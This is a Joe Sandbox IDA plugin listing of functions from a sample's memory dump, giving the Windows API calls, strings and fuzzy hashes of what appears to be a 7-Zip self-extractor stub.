                                                                • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                                                • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID: %%T/$%%T\
                                                                • API String ID: 613200358-2679640699
                                                                • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                                                • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID: %%S/$%%S\
                                                                • API String ID: 613200358-358529586
                                                                • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                                                • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID: %%M/$%%M\
                                                                • API String ID: 613200358-4143866494
                                                                • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                                                • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                                                APIs
                                                                • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow
                                                                • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                                                • API String ID: 432778473-803145960
                                                                • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                                                • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                                                APIs
                                                                  • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                                                  • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                  • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                  • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??2@$??3@$memmove
                                                                • String ID: IA$IA$IA
                                                                • API String ID: 4294387087-924693538
                                                                • Opcode ID: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                                • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                                                • Opcode Fuzzy Hash: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                                • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                                                APIs
                                                                • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                • wsprintfW.USER32 ref: 00407BBB
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@ItemMessageSendwsprintf
                                                                • String ID: %d%%
                                                                • API String ID: 3767627759-1518462796
                                                                • Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                                                • Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                                                                APIs
                                                                • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                                                • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                                                • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                • String ID: IA
                                                                • API String ID: 3462485524-3293647318
                                                                • Opcode ID: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                                • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                                                • Opcode Fuzzy Hash: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                                • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: wsprintf$ExitProcesslstrcat
                                                                • String ID: 0x%p
                                                                • API String ID: 2530384128-1745605757
                                                                • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                                                • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                                                APIs
                                                                  • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                                                  • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                                                • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                                                • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                                                • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: MetricsSystem$??3@
                                                                • String ID: 100%%
                                                                • API String ID: 2562992111-568723177
                                                                • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                                                • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                                                APIs
                                                                • wsprintfW.USER32 ref: 00407A12
                                                                  • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                  • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                                                  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: TextWindow$ItemLength$??3@wsprintf
                                                                • String ID: (%u%s)
                                                                • API String ID: 3595513934-2496177969
                                                                • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                                                • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetNativeSystemInfo$kernel32
                                                                • API String ID: 2574300362-3846845290
                                                                • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                                                • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                • API String ID: 2574300362-3900151262
                                                                • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                                                • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                • API String ID: 2574300362-736604160
                                                                • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                                                • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                  • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 1731127917-0
                                                                • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                                                • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                                                APIs
                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                                                • wsprintfW.USER32 ref: 00403FFB
                                                                • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: PathTemp$AttributesFilewsprintf
                                                                • String ID:
                                                                • API String ID: 1746483863-0
                                                                • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                                                • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                                                APIs
                                                                • CharUpperW.USER32(?,76B0E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: CharUpper
                                                                • String ID:
                                                                • API String ID: 9403516-0
                                                                • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                                                • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                                                APIs
                                                                  • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
